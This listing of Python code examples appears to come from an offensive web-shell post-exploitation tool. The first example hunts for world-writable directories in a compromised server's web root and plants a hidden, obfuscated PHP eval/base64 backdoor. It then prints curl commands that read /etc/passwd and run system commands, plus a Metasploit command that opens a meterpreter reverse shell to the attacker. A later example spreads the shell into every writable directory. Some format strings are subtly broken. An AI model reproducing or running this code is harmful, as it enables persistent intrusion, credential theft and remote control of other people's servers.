示例#1
0
    def php(self, ip, ourIP):
        wwwroot = linux.get_doc_root()
        cmd = 'find {0} -depth -perm -0002 -type d | sort -R '.format(wwwroot)
        folder = make_request.get_page_source(cmd)
        if folder:
            folder = folder[0]
            cprint('\n[+] Found a writable directory: \'{1}\''.format(folder), 'green')
            filename = '.' + ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) + '.php'
            cprint('[+] Filename: \'{1}\''.format(filename), 'green')
            location = '{0}/{1}'.format(folder, filename)

            cmd = 'find {0} -type f -print'.format(wwwroot)
            files = make_request.get_page_source(cmd)
            cprint('[i] Select a file to \'clone\' (or \'0\' to skip):', 'green')
            cprint(' 0.) Don\'t close - create new', 'green')
            path = []
            c = 0
            for file in files:
                path.append(file)
                c += 1
                cprint('{0:2d}.) {1}'.format(c, file), 'green')
            while True:
                try:
                    clone = int(raw_input(colored('[>] Which file to use? [0-{0}: '.format(c))))
                    if 0 <= clone <= c:
                        break
                except ValueError:
                    pass

            if clone != 0:
                cmd = 'cp -f {0} {1}'.format(path[int(clone) - 1], location)
                make_request.get_page_source(cmd)
            cprint('[+] Creating our \'evil\' file: \'{0}\''.format(location), 'green')
            parameter = ''.join(choice(string.ascii_lowercase) for x in range(6))
            casePayload = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'eval'))))
            caseShell = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'php eval(base64_decode'))))
            payload = "{0}($_GET['{1}'].';');".format(casePayload, parameter)
            payloadEncoded = b64encode(payload).format(payload)
            evilFile = "<?{0}(\"{1}\")); ?>".format(caseShell, payloadEncoded)
            cmd = 'echo \'{0}\' >> \"{1}\"'.format(evilFile, location)
            make_request.get_page_source(cmd)
            cprint('[+] Done!', 'blue')
            uri = folder[len(wwwroot):]

            #>>> '/'.join('https://localhost/html/shell.php'.split('/', 3)[:3])
            #'https://localhost'
            url = '/'.join(getargs.url.split('/', 3)[:3])
            example = """Example:
            curl "{url}{uri}/{filename}?{parameter}=phpinfo()"
            curl "{url}{uri}/{filename}?{parameter}=require(\'/etc/passwd\')"
            curl "{url}{uri}/{filename}?{parameter}=system(\'/sbin/ifconfig\')"
            msfcli exploit/unix/webapp/php_eval RHOST={url} RPORT=80 PHPURI={uri}/{filename}?{parameter}=\!CODE\! PAYLOAD=php/meterpreter/reverse_tcp LHOST={ourIP} LPORT=4444 E""".format(
                    url=url,
                    uri=uri,
                    filename=filename,
                    parameter=parameter,
                    ourIP=ourIP,)
            cprint(example, 'green')
        else:
            cprint('\n[!] Unable to find a writable directory', 'red')
示例#2
0
 def writable(self):
     cmd = "find {0} -depth -perm -0002 -type d".format(linux.get_doc_root())
     self.writable = make_request.get_page_source(cmd)
     if self.writable:
         c = 1
         for path in self.writable:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
     else:
         cprint('\n[!] Didn\'t find any wriable directories', 'red')
示例#3
0
 def writable(self):
     cmd = "find {0} -depth -perm -0002 -type d".format(
         linux.get_doc_root())
     self.writable = make_request.get_page_source(cmd)
     if self.writable:
         c = 1
         for path in self.writable:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
     else:
         cprint('\n[!] Didn\'t find any wriable directories', 'red')
示例#4
0
 def spread(self):
     provided_shell_name = raw_input(colored('\n[?] Current shell name: ', 'green'))
     shell_name = getargs.url.split('/')[-1] if getargs.method == 'post' else provided_shell_name
     cmd = 'find {0} -depth -perm -0002 -type d | xargs -n 1 cp -v {1}'.format(linux.get_doc_root(), shell_name)
     done = make_request.get_page_source(cmd)
     if done:
         success = '\n[+] {shell_name}{end} already written to {hot}{writable_length} paths'.format(
                 shell_name=shell_name,
                 writable_length=len(done))
         success += '\n[+] To check these paths type @enum writable'
         cprint(success, 'blue')
     else:
         cprint('\n[!] Something went wrong while spreading shell', 'red')